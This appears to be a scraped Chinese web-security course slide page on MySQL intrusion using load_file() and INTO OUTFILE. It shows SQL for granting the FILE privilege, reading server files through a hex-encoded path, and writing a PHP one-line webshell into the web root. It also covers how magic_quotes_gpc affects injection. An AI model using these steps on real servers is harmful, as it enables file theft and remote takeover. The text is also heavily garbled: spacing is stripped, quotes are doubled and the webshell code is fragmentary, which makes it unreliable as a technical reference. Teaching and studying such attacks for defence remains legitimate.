配色: 字号:
mysql_load file与Into outfile入侵
2014-01-19 | 阅:  转:  |  分享 
  
mysqlload_file与intooutfile入侵上讲回顾1,PHP服务器环境搭建2,编写存在sql注入漏洞的示例站点3,
PHP手工注入(information_schema)4,mysql.usermysql.user存放用户名密码以及用户权限
信息若File_priv为Y则可以对系统文件进行读写root用户拥有ALLPRIVILEGES预备知识1,利用load_
file()函数读取文件内容2,intooutfile或intodumpfile导出数据库内容到文件intooutfil
e导出文本形式内容intodumpfile导出二进制形式内容添加用户CREATEUSER''phpuser''@''loca
lhost''IDENTIFIEDBY'''';GRANTUSAGEON.TO''phpuser''@''l
ocalhost''IDENTIFIEDBY''''WITHMAX_QUERIES_PER_HOUR0MAX_CON
NECTIONS_PER_HOUR0MAX_UPDATES_PER_HOUR0MAX_USER_CONNECTIONS0
;设置权限REVOKEALLPRIVILEGESON.FROM''phpuser''@''localhost''
;REVOKEGRANTOPTIONON.FROM''phpuser''@''localhost'';GRAN
TSELECT,INSERT,UPDATE,DELETE,CREATE,FILEON.TO''
phpuser''@''localhost''WITHMAX_QUERIES_PER_HOUR0MAX_CONNECTIONS_
PER_HOUR0MAX_UPDATES_PER_HOUR0MAX_USER_CONNECTIONS0;load_
file演示SELECTload_file(0x643a5c5c7777775c5c696e6465782e706870)
;intooutfile演示selectfromtestintooutfile''d:\\www\\bbst.p
hp'';magic_quotes_gpcphp.ini中的magic_quotes_gpc的作用:传递$_GET,$_POS
T,$_COOKIE时是否对单引号做处理(加反斜杠,如\''),注入时如果目标开启,那么我们无法通过注入点写文件到服务器上。mag
ic_quotes_gpcoffselect''''intooutfile
''d:\\www\\bbst.php''--magic_quotes_gpconload_file()读取数据库配置文件内容
通过phpmyadmin创建表createtabletest(cmdTEXT);INSERTINTO`asd`.`
test`(`cmd`)VALUES(''要插入的内容'');插入一句话:T[cmd]);?>插入一句话:B.B.S.T信息安全团队B.B.S.T信
息安全团队讲师:MXi4oyuQQ:798033502《Web安全编程与渗透分析》B.B.S.T信息安全团队B.B.S.T信息安全团队
献花(0)
+1
(本文系alen972首藏)